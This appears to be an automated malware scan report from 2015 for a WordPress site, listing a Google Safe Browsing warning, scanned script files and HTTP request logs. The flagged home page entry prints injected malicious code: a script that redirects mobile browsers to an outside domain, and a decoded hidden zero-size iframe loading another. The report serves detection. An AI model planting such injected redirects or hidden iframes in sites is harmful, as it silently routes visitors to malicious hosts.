Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=roveofen.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://roveofen.com/ | 200 OK Content-Length: 22138 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|iphone|ipad)/i)!==null){ window.location = "http://azzm.tk/?3"; } Decoded script: <iframe src="http://bimis.ml/?1" width="0" height="0" align="left"></iframe> Antivirus reports:
| ||
http://roveofen.com/wp-includes/js/swfobject.js?ver=2.2-20120417 | 200 OK Content-Length: 10231 Content-Type: application/x-javascript | clean |
http://roveofen.com/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 95807 Content-Type: application/x-javascript | clean |
http://roveofen.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/x-javascript | clean |
http://roveofen.com/wp-content/uploads/wpcu3er/jquery.cu3er.js?ver=4.1.1 | 200 OK Content-Length: 8407 Content-Type: application/x-javascript | clean |
http://c520866.r66.cf2.rackcdn.com/1/js/easy_rotator.min.js | 200 OK Content-Length: 155522 Content-Type: application/javascript | clean |
http://roveofen.com/wp-content/themes/Karma/js/custom-main.js?ver=4.0 | 200 OK Content-Length: 20985 Content-Type: application/x-javascript | clean |
http://roveofen.com/wp-content/themes/Karma/js/superfish.js?ver=4.0 | 200 OK Content-Length: 6053 Content-Type: application/x-javascript | clean |
http://roveofen.com/wp-content/themes/Karma/js/retina.js?ver=1.3 | 200 OK Content-Length: 2649 Content-Type: application/x-javascript | clean |
http://roveofen.com/wp-content/themes/Karma/js/jquery.flexslider.js?ver=4.0 | 200 OK Content-Length: 30212 Content-Type: application/x-javascript | clean |
http://roveofen.com/wp-content/themes/Karma/js/jquery.fitvids.js?ver=4.0 | 200 OK Content-Length: 2781 Content-Type: application/x-javascript | clean |
http://roveofen.com/wp-content/themes/Karma/js/jquery.isotope.js?ver=4.0 | 200 OK Content-Length: 16033 Content-Type: application/x-javascript | clean |
http://roveofen.com/wp-includes/js/jquery/ui/core.min.js?ver=1.11.2 | 200 OK Content-Length: 3998 Content-Type: application/x-javascript | clean |
http://roveofen.com/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.2 | 200 OK Content-Length: 6903 Content-Type: application/x-javascript | clean |
http://roveofen.com/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.2 | 200 OK Content-Length: 12076 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: roveofen.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 24 Feb 2015 14:04:22 GMT
Server: nginx
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Link: <http://roveofen.com/>; rel=shortlink
Set-Cookie: wfvt_3021721153=54ec84e633091; expires=Tue, 24-Feb-2015 14:34:22 GMT; path=/; httponly
X-Pingback: http://roveofen.com/xmlrpc.php
GET / HTTP/1.1
Host: roveofen.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 24 Feb 2015 14:04:22 GMT
Server: nginx
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Link: <http://roveofen.com/>; rel=shortlink
Set-Cookie: wfvt_3021721153=54ec84e633091; expires=Tue, 24-Feb-2015 14:34:22 GMT; path=/; httponly
X-Pingback: http://roveofen.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: roveofen.com
Referer: http://www.google.com/search?q=roveofen.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: roveofen.com
Referer: http://www.google.com/search?q=roveofen.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
